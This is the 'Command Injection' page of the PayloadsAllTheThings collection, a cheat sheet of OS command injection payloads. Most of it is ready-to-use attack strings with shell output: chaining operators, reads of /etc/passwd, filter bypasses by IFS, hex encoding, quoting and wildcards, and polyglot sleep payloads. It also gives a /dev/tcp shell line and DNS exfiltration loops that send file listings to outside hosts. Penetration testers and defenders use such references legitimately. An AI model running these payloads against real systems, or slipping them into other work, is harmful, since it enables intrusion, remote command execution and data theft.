PayloadsAllTheThings/Command Injection/README.md

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# Command Injection
> Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
## Summary
* [Tools](#tools)
* [Exploits](#exploits)
* [Basic commands](#basic-commands)
* [Chaining commands](#chaining-commands)
* [Inside a command](#inside-a-command)
* [Filter Bypasses](#filter-bypasses)
* [Bypass without space](#bypass-without-space)
* [Bypass with a line return](#bypass-with-a-line-return)
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
* [Bypass blacklisted words](#bypass-blacklisted-words)
* [Bypass with single quote](#bypass-with-single-quote)
* [Bypass with double quote](#bypass-with-double-quote)
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
* [Bypass with $@](#bypass-with-)
* [Bypass with $()](#bypass-with--1)
* [Bypass with variable expansion](#bypass-with-variable-expansion)
* [Bypass with wildcards](#bypass-with-wildcards)
* [Challenge](#challenge)
* [Time based data exfiltration](#time-based-data-exfiltration)
* [DNS based data exfiltration](#dns-based-data-exfiltration)
* [Polyglot command injection](#polyglot-command-injection)
* [References](#references)
## Tools
* [commix - Automated All-in-One OS command injection and exploitation tool](https://github.com/commixproject/commix)
## Exploits
### Basic commands
Execute the command and voila :p
```powershell
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
```
### Chaining commands
```powershell
original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
original_cmd_by_server || ls # Only if the first cmd fail
```
### Inside a command
```bash
original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd)
```
## Filter Bypasses
### Bypass without space
Works on Linux only.
```powershell
swissky@crashlab:~/Www$ cat</etc/passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ {cat,/etc/passwd}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab:~$ cat$IFS/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab:~$ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
RCE
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
swissky@crashlab:~$ X=$'uname\x20-a'&&$X
Linux crashlab 4.4.X-XX-generic #72-Ubuntu
swissky@crashlab:~$ sh</dev/tcp/127.0.0.1/4242
```
Commands execution without spaces, $ or { } - Linux (Bash only)
```powershell
IFS=,;`cat<<<uname,-a`
```
Tabs work as separators in web apps where spaces are removed.
```powershell
;ls%09-al%09/home
drwxr-xr-x 4 root root 4096 Jan 10 13:34 .
drwxr-xr-x 18 root root 4096 Jan 10 13:33 ..
drwx------ 2 root root 16384 Jan 10 13:31 lost+found
drwxr-xr-x 4 test test 4096 Jan 13 08:30 test
```
Works on Windows only.
```powershell
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
```
### Bypass with a line return
```powershell
something%0Acat%20/etc/passwd
```
You can also write files.
```powershell
;cat>/tmp/hi<<EOF%0ahello%0aEOF
;cat</tmp/hi
hello
```
### Bypass characters filter via hex encoding
Linux
```powershell
swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd
swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd
swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd
swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash
```
### Bypass characters filter
Commands execution without backslash and slash - linux bash
```powershell
swissky@crashlab:~$ echo ${HOME:0:1}
/
swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/
swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/
swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash
```
### Bypass Blacklisted words
#### Bypass with single quote
```powershell
w'h'o'am'i
```
#### Bypass with double quote
```powershell
w"h"o"am"i
```
#### Bypass with backslash and slash
```powershell
w\ho\am\i
/\b\i\n/////s\h
```
#### Bypass with $@
```powershell
who$@ami
echo $0
-> /usr/bin/zsh
echo whoami|$0
```
### Bypass with $()
```powershell
who$()ami
who$(echo am)i
who`echo am`i
```
#### Bypass with variable expansion
```powershell
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
```
#### Bypass with wildcards
```powershell
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
```
## Challenge
Challenge based on the previous tricks, what does the following command do:
```powershell
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
```
## Time based data exfiltration
Extracting data : char by char
```powershell
swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
```
## DNS based data exfiltration
Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca
```powershell
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
```
```powershell
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```
Online tools to check for DNS based data exfiltration:
- dnsbin.zhack.ca
- pingb.in
## Polyglot command injection
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
e.g:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
```
```bash
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
e.g:
echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
```
## Labs
* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
## References
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [Bug Bounty Survey - Windows RCE spaceless](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
* [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection)